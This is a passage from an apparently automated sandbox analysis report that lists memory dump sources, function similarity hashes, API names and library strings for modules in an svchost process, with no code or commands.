                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: BindComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-666356695
                                                                                            • Opcode ID: bfde9dda282d9bf131b604a22531f0ab72d6f1586674c596e60c2b778f9a4e64
                                                                                            • Instruction ID: 39d9a9a1155828858ded95276f0713221d45f9f3938e91bc08fc9d01a60b59ce
                                                                                            • Opcode Fuzzy Hash: bfde9dda282d9bf131b604a22531f0ab72d6f1586674c596e60c2b778f9a4e64
                                                                                            • Instruction Fuzzy Hash: F7F06DA2B1A64681FA50DB15E061BA92362EB80798F482032DE0E17346CE3AD58AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: ParseComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3656836847
                                                                                            • Opcode ID: 2ba5dec67f564cfc6e12e7384cc32b387355ce5683bd26650348b043a23d28f4
                                                                                            • Instruction ID: 67267b8b84ec464c9a807369892c8f361200c42ec71cf6354c3d594145560e86
                                                                                            • Opcode Fuzzy Hash: 2ba5dec67f564cfc6e12e7384cc32b387355ce5683bd26650348b043a23d28f4
                                                                                            • Instruction Fuzzy Hash: 71F06D62B1A64681FA50DB15E061BA92362EB80798F482032DE0E17346CE3AD58AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_delete
                                                                                            • String ID: ssl\quic\quic_lcidm.c
                                                                                            • API String ID: 3239526987-3923830422
                                                                                            • Opcode ID: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                            • Instruction ID: d20200ce136b5170478d5d394569f378574f111e78d95fe61d09e5b17698888d
                                                                                            • Opcode Fuzzy Hash: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                            • Instruction Fuzzy Hash: 04E01A91F0A50682FA109B57C8A5178A762EB8CFC4F1C9432EE0D9B367CE1ED4418318
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalLeaveSectionfree
                                                                                            • String ID:
                                                                                            • API String ID: 1679108487-0
                                                                                            • Opcode ID: 500263fb43dee4791e1e6a673451172170e6ad9135be3006d8eeec49efba4b7b
                                                                                            • Instruction ID: e36ba6a50b6231787f829567ba99692f9d2c64aa5cb6aea2564bc56613c0d97c
                                                                                            • Opcode Fuzzy Hash: 500263fb43dee4791e1e6a673451172170e6ad9135be3006d8eeec49efba4b7b
                                                                                            • Instruction Fuzzy Hash: 0F41063174EE1481F7159B85AA9031BAEA5FB59BC4FC84835CD1807B54EF7BD4A1C380
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$ErrorLastStartupmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2139478859-0
                                                                                            • Opcode ID: c1b7b147e9083f6c855934e1965602a425ceba7aacc208d876a385948deaf939
                                                                                            • Instruction ID: 8d2d9139116b26880d0addc983bd5d87bf7ad2d9616bf05e9c2900a629478e20
                                                                                            • Opcode Fuzzy Hash: c1b7b147e9083f6c855934e1965602a425ceba7aacc208d876a385948deaf939
                                                                                            • Instruction Fuzzy Hash: 24217F22B0AE4285FA45DF1191643B963A2AF44FC4F5C6470EE0D6BB56DF3EE8818358
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36DA810: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA836
                                                                                              • Part of subcall function 00007FFDA36DA810: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA850
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D6A85
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D6A99
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrncmp
                                                                                            • String ID:
                                                                                            • API String ID: 1891267927-0
                                                                                            • Opcode ID: 38dd9ff49b41bcd66a20388cf46bf153bdee0f43bb64d8220b12d13a2ee80680
                                                                                            • Instruction ID: abdb90f20d9c36b7e62aee18ed14ef20b6e32fe516cd7d3d9879f131e35c6351
                                                                                            • Opcode Fuzzy Hash: 38dd9ff49b41bcd66a20388cf46bf153bdee0f43bb64d8220b12d13a2ee80680
                                                                                            • Instruction Fuzzy Hash: A8113D22B0AA4281FF848F15E2A43B92362EB54BC8F8C6030CA1D5A756DF7ED8D5C744
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: ec730df48e5626f3e40dff1944ecef16541db388a6c3708d3721763f4f39ad85
                                                                                            • Instruction ID: a94ec92126d1f81026dc317bdf6acd2028296fe6a95fe64c247030d1180bd68e
                                                                                            • Opcode Fuzzy Hash: ec730df48e5626f3e40dff1944ecef16541db388a6c3708d3721763f4f39ad85
                                                                                            • Instruction Fuzzy Hash: AC210333716BC2A3EA0E8B25D6502AAB768FB08B80F0C1135EB6907751CF39A171C344